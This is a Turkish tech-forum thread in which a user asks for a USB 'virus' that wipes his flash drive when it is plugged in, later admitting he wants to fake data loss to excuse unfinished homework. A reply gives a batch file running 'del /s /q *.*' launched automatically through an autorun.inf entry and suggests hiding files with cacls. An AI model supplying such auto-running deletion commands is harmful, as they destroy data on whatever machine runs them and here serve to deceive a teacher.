Flash Diskteki Her Şeyi Silen Virüs

Bu konuyu okuyanlar

unutulmazx

Doçent
Reaksiyon puanı
14
Merhaba arkadaşlar ben kendi flashıma virüs atmak istiyorum kötü bir amaçlı değil sadece bilgisayara takınca içindeki her şeyi silmesi lazım yani flashta bir virüs olacak ve antivirüs programı bu virüsü bulunca flashdiskin içindeki her şeyi silecek var mı böyle bir şey geçende başıma geldi de ondan soruyorum.

- - - Mesaj Güncellendi - - -

bilen varsa lütfen söylesin çok önemli ve acil...

Deleted-Name

Müdavim
Cezalı
Reaksiyon puanı
18
bat dosyası yap ama otomatik çalışması için autorun.inf dosyasına adını yazmalısın.
Kod:
del /s /q *.*
sonra autorun.inf dosyası oluştur içine
Kod:
[autorun]
open=silme.bat
denemedim ama çalışması lazım, dediğini tam anlamadım ama böyle bir şey galiba

unutulmazx

Doçent
Reaksiyon puanı
14
hani bir dosya aracılığıyla değil .bat aracılıyla değilde başka bir bilgisayara falan takınca antivirüs programı içindeki dosyayı farkettiği anda direk flashın içindeki her şeyi silsin istiyorum yada görünmez yapsın gözükmesin gibi bişey

Deleted-Name

Müdavim
Cezalı
Reaksiyon puanı
18
hani bir dosya aracılığıyla değil .bat aracılıyla değilde başka bir bilgisayara falan takınca antivirüs programı içindeki dosyayı farkettiği anda direk flashın içindeki her şeyi silsin istiyorum yada görünmez yapsın gözükmesin gibi bişey
o zaman cacls ile görünmez yapabilirsin de anlamadım ki sen silmek mi istiyorsun görünmez mi yapmak istiyorsun yukarıdaki bat dosyası flash'ı bilgisayara takınca her şeyi siler içindeki antivirüse filan bakmaz yani

unutulmazx

Doçent
Reaksiyon puanı
14
hah işte şöyle bir şey olmuştu geçende flashıma açınca sonra dosyalarıma ulaşamadım biçimlendirmek zorunda kalmıştım.
DE76A7FABD746A2391CF2203130ABA71.jpg

yani böyle bir şey olması lazım ben dosyalara erişememem lazım çünkü ödevim vardı ve çok zor bir ödevdi süresi de kısaydı yapamadım ama hafta sonu yapabilirim. yani flashdiskimde virüs varmış her şeyi sildi pazartesi getireyim diye bir yalan uydurmam lazım anladınız mı ? :)

honline

Müdavim
Reaksiyon puanı
296
hah işte şöyle bir şey olmuştu geçende flashıma açınca sonra dosyalarıma ulaşamadım biçimlendirmek zorunda kalmıştım.

yani böyle bir şey olması lazım ben dosyalara erişememem lazım çünkü ödevim vardı ve çok zor bir ödevdi süresi de kısaydı yapamadım ama hafta sonu yapabilirim. yani flashdiskimde virüs varmış her şeyi sildi pazartesi getireyim diye bir yalan uydurmam lazım anladınız mı ? :)
Ögretmen getir bi recovery yapayım derse görürsün

apotaha

Asistan
Reaksiyon puanı
1

biz turkler yok muyuz :))

Seyhoo

Müdavim
Cezalı
Reaksiyon puanı
741
Mesaj at sana kralını göndereyim

Kadima

Müdavim
Reaksiyon puanı
841

bu mesajından sonra gelecek olan yardımların çoğunu kaybettin sen.
rmdd8M.gif